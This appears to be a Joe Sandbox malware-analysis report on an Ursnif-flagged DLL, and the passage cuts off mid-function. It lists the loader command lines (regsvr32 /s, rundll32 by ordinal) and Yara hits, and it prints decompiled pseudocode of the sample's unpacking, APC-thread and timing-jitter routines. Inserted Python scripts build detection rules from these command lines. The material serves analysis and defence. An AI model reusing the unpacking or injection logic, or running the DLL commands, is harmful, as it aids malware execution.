                                                              Commandline: regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
                                                              Imagebase: 0x1070000
                                                              File size: 20992 bytes
                                                              MD5 hash: 426E7499F6A7346F0410DEAD0805586B
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              General

                                                              Start time:15:08:25
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                                                              Imagebase:0xa20000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              General

                                                              Start time:15:08:26
                                                              Start date:20/10/2021
                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                              Imagebase:0x7ff751890000
                                                              File size:823560 bytes
                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:15:08:26
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
                                                              Imagebase:0xa20000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, Author: Joe Security
                                                              Reputation:high
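The four loader command lines in the process blocks above (cmd.exe /C handing off to rundll32 with an ordinal export, regsvr32 /s, and rundll32 calling DllUnregisterServer, all against a DLL under the user's Desktop) form a recognisable pattern in process-creation telemetry. The script below is an added example, not part of the Joe Sandbox report or of the sample: it scores such events. EVENTS is constructed from the Path and Commandline fields shown above plus two benign controls; the event dict layout (a normalised Sysmon Event ID 1 record) and the parent link for the rundll32 child, inferred from the cmd.exe command line, are assumptions.

```python
"""Flag the DLL-loader command lines seen in this report's process list.

Added example; not part of the Joe Sandbox report or the sample. EVENTS is
constructed from the Path/Commandline fields above (the parent link for the
rundll32 child is inferred from the cmd.exe command line), plus two benign
controls; the dict layout is an assumed normalisation of a process-creation
record such as Sysmon Event ID 1 (Image, CommandLine, ParentCommandLine).
"""
import re

# Locations a standard user can write to. A loader DLL here is the interesting
# case; rundll32/regsvr32 on System32 or Program Files DLLs is everyday noise.
USER_WRITABLE = re.compile(
    r"(?i)^[a-z]:\\(?:users\\[^\\]+\\(?:desktop|downloads|documents|appdata)"
    r"|programdata|windows\\temp)\\"
)
# rundll32 argument: <dll>[,<export>], DLL optionally single- or double-quoted.
RUNDLL_ARG = re.compile(r"""^(?:"([^"]+)"|'([^']+)'|([^\s,]+))(?:\s*,\s*(\S+))?""")
CMD_C_PARENT = re.compile(r'(?:^|\\)cmd(?:\.exe)?"?\s+/c\s')

ORDINAL = "rundll32 calls an export by ordinal (#N)"
USER_PATH = "DLL loaded from a user-writable path"
COM_EXPORT = "rundll32 invokes DllRegisterServer/DllUnregisterServer (regsvr32 semantics)"
BAD_EXT = "DLL has a non-.dll extension"
SILENT = "regsvr32 run silently (/s) on a user-writable DLL"
VIA_CMD = "spawned through cmd.exe /C"


def _args_after_exe(command_line):
    """Drop the first token (the executable), honouring a double-quoted path."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) == 2 else ""


def _regsvr32_target(args):
    """Split regsvr32 arguments into (dll_path, set_of_flags)."""
    flags, path = [], []
    for tok in args.split():
        (flags if tok[0] in "/-" else path).append(tok)
    return " ".join(path).strip("\"'"), {f.lower() for f in flags}


def assess(event):
    """Return the reasons an event looks like loader abuse; [] means benign."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    args = _args_after_exe(event["command_line"])
    reasons = []
    if image == "rundll32.exe":
        m = RUNDLL_ARG.match(args)
        if not m:
            return reasons
        dll = m.group(1) or m.group(2) or m.group(3)
        export = m.group(4) or ""
        base = dll.rsplit("\\", 1)[-1].lower()
        if USER_WRITABLE.match(dll):
            reasons.append(USER_PATH)
        if export.startswith("#"):
            reasons.append(ORDINAL)
        if export.lower() in ("dllregisterserver", "dllunregisterserver"):
            reasons.append(COM_EXPORT)
        if "." in base and not base.endswith(".dll"):
            reasons.append(BAD_EXT)
    elif image == "regsvr32.exe":
        dll, flags = _regsvr32_target(args)
        if dll and USER_WRITABLE.match(dll):
            reasons.append(USER_PATH)
            if "/s" in flags:
                reasons.append(SILENT)
    # Only escalate on the parent when the child already looks wrong.
    if reasons and CMD_C_PARENT.search(event.get("parent_command_line", "").lower()):
        reasons.append(VIA_CMD)
    return reasons


# Constructed from the process blocks above; the last two are benign controls.
EVENTS = [
    {"image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1"},
    {"image": r"C:\Windows\SysWOW64\rundll32.exe",
     "command_line": r"rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1",
     "parent_command_line": r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1"},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Users\user\Desktop\gECym.dll"},
    {"image": r"C:\Windows\SysWOW64\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
]


def triage(events):
    """Pair each command line with its reasons, for a quick review table."""
    return [(e["command_line"], assess(e)) for e in events]


if __name__ == "__main__":
    for cmd, why in triage(EVENTS):
        print("%-75s %s" % (cmd, "; ".join(why) or "ok"))
```

assess() returns an empty list for the two controls, so the rules fire on the path-plus-invocation combination rather than on rundll32 or regsvr32 by themselves; USER_WRITABLE is the knob to adjust for an environment before using this for alerting.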
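The Yara match lists above repeat the same dump identifier with different sequence numbers, which makes it hard to see at a glance how many distinct injected regions there are. The script below is an added example, not part of the Joe Sandbox report: it groups the "Source:" identifiers by process and region base. MATCHES is a constructed subset of the identifiers shown above. Each identifier is read as six dot-separated fields before ".sdmp", with field 0 as the report's process index (it lines up with the process blocks above) and field 3 as the hexadecimal base address of the dumped region; that reading is an assumption, the page does not define the format, and the remaining fields are left uninterpreted.

```python
"""Summarise the Yara hits listed above by process and dumped memory region.

Added example; not part of the Joe Sandbox report. The identifier format
(field 0 = process index, field 3 = region base address) is an assumption;
the other fields are carried through untouched.
"""
from collections import defaultdict

# Process index -> command line, taken from the process blocks above.
PROCESS_NAMES = {
    3: "regsvr32.exe /s gECym.dll",
    4: "rundll32.exe gECym.dll,#1",
    6: "rundll32.exe gECym.dll,DllUnregisterServer",
}

# Constructed subset of the Yara "Source:" values shown above.
MATCHES = [
    "00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp",
    "00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp",
    "00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp",
    "00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp",
    "00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp",
    "00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp",
    "00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp",
]


def parse_source(source):
    """Split a dump identifier into its fields; raise on anything unexpected."""
    if not source.endswith(".sdmp"):
        raise ValueError("not a .sdmp identifier: %r" % source)
    fields = source[: -len(".sdmp")].split(".")
    if len(fields) != 6:
        raise ValueError("expected 6 fields, got %d: %r" % (len(fields), source))
    return {
        "process": int(fields[0]),   # assumed: process index within the report
        "base": int(fields[3], 16),  # assumed: base address of the dumped region
        "raw": fields,               # the fields this example does not interpret
    }


def summarise(matches):
    """Return {process_index: {base_address: hit_count}}."""
    hits = defaultdict(lambda: defaultdict(int))
    for src in matches:
        parsed = parse_source(src)
        hits[parsed["process"]][parsed["base"]] += 1
    return {proc: dict(regions) for proc, regions in hits.items()}


def report(matches, names=PROCESS_NAMES):
    """One line per (process, region), most-hit regions first within a process."""
    lines = []
    for proc, regions in sorted(summarise(matches).items()):
        for base, n in sorted(regions.items(), key=lambda kv: -kv[1]):
            lines.append("process %d (%s): region 0x%08X, %d hit(s)"
                         % (proc, names.get(proc, "?"), base, n))
    return lines


if __name__ == "__main__":
    print("\n".join(report(MATCHES)))
```

On the full lists above the same picture emerges: one dominant region per process (0x5528000 in regsvr32.exe, 0x5AC8000 in the first rundll32.exe) hit repeatedly as the sandbox re-dumped it, plus a single additional region each, which is what to expect from one injected payload rather than many.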

                                                              Disassembly

                                                              Code Analysis


                                                                Executed Functions

                                                                C-Code - Quality: 83%
                                                                			E10001540(char _a4) {
                                                                				long _v8;
                                                                				long _v12;
                                                                				char _v36;
                                                                				void* __edi;
                                                                				long _t25;
                                                                				long _t27;
                                                                				long _t28;
                                                                				long _t32;
                                                                				void* _t38;
                                                                				intOrPtr _t40;
                                                                				signed int _t44;
                                                                				signed int _t45;
                                                                				long _t50;
                                                                				intOrPtr _t52;
                                                                				signed int _t53;
                                                                				void* _t57;
                                                                				void* _t60;
                                                                				signed int _t62;
                                                                				signed int _t63;
                                                                				void* _t67;
                                                                				intOrPtr* _t68;
                                                                
                                                                				_t25 = E10001EE5();
                                                                				_v8 = _t25;
                                                                				if(_t25 != 0) {
                                                                					return _t25;
                                                                				}
                                                                				do {
                                                                					_t62 = 0;
                                                                					_v12 = 0;
                                                                					_t50 = 0x30;
                                                                					do {
                                                                						_t57 = E10001B5A(_t50);
                                                                						if(_t57 == 0) {
                                                                							_v8 = 8;
                                                                						} else {
                                                                 							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed; class 8 = SystemProcessorPerformanceInformation, one 0x30-byte entry per CPU
                                                                							_t53 = _t44;
                                                                 							_t45 = _t44 & 0x0000ffff; // low word of the NTSTATUS
                                                                 							_v8 = _t45;
                                                                 							if(_t45 == 4) { // low word of STATUS_INFO_LENGTH_MISMATCH (0xC0000004): grow by one entry and retry
                                                                 								_t50 = _t50 + 0x30;
                                                                 							}
                                                                							_t63 = 0x13;
                                                                							_t10 = _t53 + 1; // 0x1
                                                                 							_t62 =  *_t57 % _t63 + _t10; // jitter seed: first DWORD of the buffer (low half of CPU 0 IdleTime) mod 19, plus status + 1
                                                                							E1000167E(_t57);
                                                                						}
                                                                					} while (_v8 != 0);
                                                                 					_t27 = E10001B6F(_t57, _t62); // executed
                                                                 					_v8 = _t27;
                                                                 					Sleep(_t62 << 4); // executed; 16 * jitter ms (16..304 ms when the query returned 0)
                                                                 					_t28 = _v8;
                                                                 				} while (_t28 == 9); // repeat the whole block while E10001B6F reports 9
                                                                				if(_t28 != 0) {
                                                                					L25:
                                                                					return _t28;
                                                                				}
                                                                				if(_a4 != 0) {
                                                                					L18:
                                                                					_push(0);
                                                                					_t67 = E10001FB2(E1000169A,  &_v36);
                                                                					if(_t67 == 0) {
                                                                						_v8 = GetLastError();
                                                                					} else {
                                                                						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                                                						_v8 = _t32;
                                                                						if(_t32 == 0) {
                                                                							GetExitCodeThread(_t67,  &_v8);
                                                                						}
                                                                						CloseHandle(_t67);
                                                                					}
                                                                					_t28 = _v8;
                                                                					if(_t28 == 0xffffffff) {
                                                                						_t28 = GetLastError();
                                                                					}
                                                                					goto L25;
                                                                				}
                                                                				if(E10001402(_t53,  &_a4) != 0) {
                                                                					 *0x10004138 = 0;
                                                                					goto L18;
                                                                				}
                                                                				_t52 = _a4;
                                                                				_t68 = __imp__GetLongPathNameW;
                                                                				_t38 =  *_t68(_t52, 0, 0); // executed
                                                                				_t60 = _t38;
                                                                				if(_t60 == 0) {
                                                                					L16:
                                                                					 *0x10004138 = _t52;
                                                                					goto L18;
                                                                				}
                                                                				_t19 = _t60 + 2; // 0x2
                                                                				_t40 = E10001B5A(_t60 + _t19);
                                                                				 *0x10004138 = _t40;
                                                                				if(_t40 == 0) {
                                                                					goto L16;
                                                                				}
                                                                				 *_t68(_t52, _t40, _t60); // executed
                                                                				E1000167E(_t52);
                                                                				goto L18;
                                                                			}
                                                                 Instruction address column for the listing above (one address per decompiled statement, 0x10001546 to 0x1000167b; 0x00000000 marks statements with no code of their own, such as the goto lines).

                                                                APIs
                                                                  • Part of subcall function 10001EE5: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                                                  • Part of subcall function 10001EE5: GetVersion.KERNEL32 ref: 10001F03
                                                                  • Part of subcall function 10001EE5: GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                                                  • Part of subcall function 10001EE5: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,751463F0,00000000), ref: 10001B66
                                                                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 10001575
                                                                • Sleep.KERNELBASE(00000000,00000000,00000030,751463F0,00000000), ref: 100015BC
                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100015F2
                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001610
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,1000169A,?,00000000), ref: 10001647
                                                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001659
                                                                • CloseHandle.KERNEL32(00000000), ref: 10001660
                                                                • GetLastError.KERNEL32(1000169A,?,00000000), ref: 10001668
                                                                • GetLastError.KERNEL32 ref: 10001675
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                • String ID:
                                                                • API String ID: 3479304935-0
                                                                • Opcode ID: 03e72af39cae86b366e05527bfd586aa9639cb38a2ce4877cc9b3c3daefd0529
                                                                • Instruction ID: 285dab0012166d7ca4fd78fd081d31803307da6268f270452850b2542231148d
                                                                • Opcode Fuzzy Hash: 03e72af39cae86b366e05527bfd586aa9639cb38a2ce4877cc9b3c3daefd0529
                                                                • Instruction Fuzzy Hash: E231BF75901626ABF711DFA48C94ADF7BECEF442E5F154126F901E7148EB31DE408BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                				long _v8;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				char _t9;
                                                                				void* _t10;
                                                                				void* _t18;
                                                                				void* _t23;
                                                                 				void* _t36;
                                                                 				void* _t41;
                                                                
                                                                				_push(__ecx);
                                                                				_t9 = _a8;
                                                                				_v8 = 1;
                                                                 				if(_t9 == 0) { // fdwReason == DLL_PROCESS_DETACH
                                                                 					_t10 = InterlockedDecrement(0x10004108); // module reference count
                                                                					__eflags = _t10;
                                                                					if(_t10 == 0) {
                                                                						__eflags =  *0x1000410c;
                                                                						if( *0x1000410c != 0) {
                                                                 							_t36 = 0x2328; // 9000 ms budget for the worker thread to clear the flag at 0x10004118
                                                                							while(1) {
                                                                 								SleepEx(0x64, 1); // 100 ms, alertable
                                                                								__eflags =  *0x10004118;
                                                                								if( *0x10004118 == 0) {
                                                                									break;
                                                                								}
                                                                								_t36 = _t36 - 0x64;
                                                                								__eflags = _t36;
                                                                								if(_t36 > 0) {
                                                                									continue;
                                                                								}
                                                                								break;
                                                                							}
                                                                							CloseHandle( *0x1000410c);
                                                                						}
                                                                 						HeapDestroy( *0x10004110); // private heap created on attach
                                                                					}
                                                                				} else {
                                                                 					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) { // DLL_PROCESS_ATTACH, first attach only
                                                                 						_t18 = HeapCreate(0, 0x400000, 0); // executed; private growable heap, 4 MiB initial size
                                                                 						 *0x10004110 = _t18;
                                                                						_t41 = _t18;
                                                                						if(_t18 == 0) {
                                                                							L6:
                                                                							_v8 = 0;
                                                                						} else {
                                                                							 *0x10004130 = _a4;
                                                                							asm("lock xadd [eax], edi");
                                                                							_push( &_a8);
                                                                							_t23 = E10001FB2(E10001CE7, E10001C93(_a12, 1, 0x10004118, _t41));
                                                                							 *0x1000410c = _t23;
                                                                							if(_t23 == 0) {
                                                                								asm("lock xadd [esi], eax");
                                                                								goto L6;
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _v8;
                                                                			}

                                                                APIs
                                                                • InterlockedIncrement.KERNEL32(10004108), ref: 100018B1
                                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 100018C6
                                                                  • Part of subcall function 10001FB2: CreateThread.KERNEL32 ref: 10001FC9
                                                                  • Part of subcall function 10001FB2: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                                                  • Part of subcall function 10001FB2: GetLastError.KERNEL32(00000000), ref: 10001FE9
                                                                  • Part of subcall function 10001FB2: TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                                                  • Part of subcall function 10001FB2: CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                                                  • Part of subcall function 10001FB2: SetLastError.KERNEL32(00000000), ref: 10002003
                                                                • InterlockedDecrement.KERNEL32(10004108), ref: 10001919
                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 10001933
                                                                • CloseHandle.KERNEL32 ref: 1000194F
                                                                • HeapDestroy.KERNEL32 ref: 1000195B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                • String ID:
                                                                • API String ID: 2110400756-0
                                                                • Opcode ID: a381869359a9508cb33ae637dc0739d9aafe6e8a786b58040b2bee40ed73f70b
                                                                • Instruction ID: 29134dd7f3199aa2df81569bc46c6dd4be899e0037607ac4421cb920fb4b24cd
                                                                • Opcode Fuzzy Hash: a381869359a9508cb33ae637dc0739d9aafe6e8a786b58040b2bee40ed73f70b
                                                                • Instruction Fuzzy Hash: F721A5B1501225AFF701DF69CCD8ACA7BE8F7553E07128135F605E3168DB309E808B64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E10001FB2(long _a4, DWORD* _a12) {
                                                                				_Unknown_base(*)()* _v0;
                                                                				void* _t4;
                                                                				long _t6;
                                                                				long _t11;
                                                                				void* _t13;
                                                                
                                                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
                                                                				_t13 = _t4;
                                                                				if(_t13 != 0) {
                                                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                					if(_t6 == 0) {
                                                                						_t11 = GetLastError();
                                                                						TerminateThread(_t13, _t11);
                                                                						CloseHandle(_t13);
                                                                						_t13 = 0;
                                                                						SetLastError(_t11);
                                                                					}
                                                                				}
                                                                				return _t13;
                                                                			}


                                                                APIs
                                                                • CreateThread.KERNEL32 ref: 10001FC9
                                                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                                                • GetLastError.KERNEL32(00000000), ref: 10001FE9
                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                                                • CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                                                • SetLastError.KERNEL32(00000000), ref: 10002003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                • String ID:
                                                                • API String ID: 3832013932-0
                                                                • Opcode ID: c1965fa1aae3c231c6185313c3a25682be54ce8a4eee52ae1245e51d466a3a5a
                                                                • Instruction ID: ce2c0407e613e175972c0e078a1766e58809613f973274f1339e8cc1b503390c
                                                                • Opcode Fuzzy Hash: c1965fa1aae3c231c6185313c3a25682be54ce8a4eee52ae1245e51d466a3a5a
                                                                • Instruction Fuzzy Hash: 75F0F832A06731BBF3235BA19CD8F5BBFADFB087D2F018504F60591168C72198108BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			E10001B6F(void* __edi, intOrPtr _a4) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				unsigned int _v16;
                                                                				intOrPtr _v20;
                                                                				char _v24;
                                                                				void* _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				void* _v40;
                                                                				signed int _v48;
                                                                				signed int _v52;
                                                                				intOrPtr _t46;
                                                                				void* _t53;
                                                                				intOrPtr _t54;
                                                                				intOrPtr _t57;
                                                                				signed int _t66;
                                                                				intOrPtr _t68;
                                                                				intOrPtr _t83;
                                                                				void* _t84;
                                                                
                                                                				_t83 =  *0x10004130;
                                                                				_t46 = E10002016(_t83,  &_v24,  &_v16);
                                                                				_v20 = _t46;
                                                                				if(_t46 == 0) {
                                                                					asm("sbb ebx, ebx");
                                                                					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                					_t84 = _t83 + _v24;
                                                                					_v40 = _t84;
                                                                					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                                                					_v28 = _t53;
                                                                					if(_t53 == 0) {
                                                                						_v20 = 8;
                                                                					} else {
                                                                						_v8 = _v8 & 0x00000000;
                                                                						if(_t66 <= 0) {
                                                                							_t54 =  *0x10004140;
                                                                						} else {
                                                                							_t68 = _a4;
                                                                							_t57 = _t53 - _t84;
                                                                							_t13 = _t68 + 0x100051a7; // 0x100051a7
                                                                							_v32 = _t57;
                                                                							_v36 = _t57 + _t13;
                                                                							_v12 = _t84;
                                                                							while(1) {
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								E1000185E(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                                                								_v12 = _v12 + 0x1000;
                                                                								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                                								_v8 = _v8 + 1;
                                                                								 *0x10004140 = _t54;
                                                                								if(_v8 >= _t66) {
                                                                									break;
                                                                								}
                                                                								_t57 = _v32;
                                                                							}
                                                                						}
                                                                						if(_t54 != 0x69b25f44) {
                                                                							_v20 = 9;
                                                                						} else {
                                                                							memcpy(_v40, _v28, _v16);
                                                                						}
                                                                						VirtualFree(_v28, 0, 0x8000); // executed
                                                                					}
                                                                				}
                                                                				return _v20;
                                                                			}


                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,751463F0,00003000,00000004,00000030,00000000,751463F0,00000000,?,?,?,?,?,?,100015B5,00000000), ref: 10001BC5
                                                                • memcpy.NTDLL(?,100015B5,751463F0,?,?,?,?,?,?,100015B5,00000000,00000030,751463F0,00000000), ref: 10001C60
                                                                • VirtualFree.KERNELBASE(100015B5,00000000,00008000,?,?,?,?,?,?,100015B5,00000000), ref: 10001C7B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$AllocFreememcpy
                                                                • String ID: Sep 21 2021
                                                                • API String ID: 4010158826-1195158264
                                                                • Opcode ID: 1cf6a1cf18816b3f23088f12a22e2bb8198dc4b4d5f5cf741d8892bebb34b570
                                                                • Instruction ID: 952fea5554e6ea9c6b6d701a00e5359ec4800a23aeca9bf1122bd908d9cf0ac5
                                                                • Opcode Fuzzy Hash: 1cf6a1cf18816b3f23088f12a22e2bb8198dc4b4d5f5cf741d8892bebb34b570
                                                                • Instruction Fuzzy Hash: 75312175D40219EBEB01CF94CD81BDEB7B8FF08344F104169EA05BB245DB71AA45CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 87%
                                                                			E10001CE7(void* __ecx, char _a4) {
                                                                				long _t3;
                                                                				int _t4;
                                                                				int _t9;
                                                                				void* _t13;
                                                                
                                                                				_t13 = GetCurrentThread();
                                                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                				if(_t3 != 0) {
